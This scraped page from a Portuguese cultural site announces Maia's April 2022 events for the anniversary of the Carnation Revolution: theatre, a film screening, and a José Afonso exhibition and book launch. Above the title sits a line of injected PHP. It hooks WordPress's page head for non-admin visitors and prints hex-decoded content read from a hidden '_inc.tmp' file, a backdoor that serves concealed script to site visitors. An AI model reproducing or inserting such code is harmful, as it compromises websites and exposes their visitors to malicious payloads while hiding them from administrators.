if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Abril na Maia - artesentreasletras.com.pt

Abril na Maia

Para assinalar os 48 anos da Revolução dos Cravos, a Câmara Municipal da Maia tem um programa que inclui teatro, cinema, uma exposição e apresentação de um livro sobre Zeca Afonso.
O Teatro Art’Imagem leva ao palco do Grande Auditório do Fórum da Maia o Tríptico Teatral – “A Identificação de um (o meu) País, com exibições na quinta-feira, dia 21, “O fascismo (aqui) nunca existiu”; no sábado, dia 23, “Os anos que abalaram o (nosso) mundo!”; e no dia 25 de abril, segunda-feira, “Ai o medo que (nós) temos de existir!”, terceira e última parte que estreou o mês passado na Quinta da Caverneira. Todas as peças são de entrada livre.
No Auditório Venepor, o Cineclube da Maia também se associa ao aniversário do 25 de abril de 1974 com a exibição do filme “Prazer, Camaradas!”, de José Filipe Costa.
A Biblioteca da Maia assinala o Dia da Liberdade lembrando o cantor-compositor mais identificado com a data, José Afonso, mais conhecido por Zeca Afonso. “José Afonso – Geografia de uma vida”, em parceria com a Associação José Afonso a Biblioteca tem ao dispor uma exposição que tem como objetivo dar a conhecer e ilustrar os locais onde José Afonso viveu. Regista sucintamente os locais que marcaram o mapa de Zeca Afonso e assim, também, a cronologia da sua vida. Na segunda-feira, 25 de abril, às 17h30 a Biblioteca Municipal Maia, promove a apresentação do livro “JOSÉ AFONSO – Todas as canções”, «”José Afonso é o nosso maior cantor de intervenção!”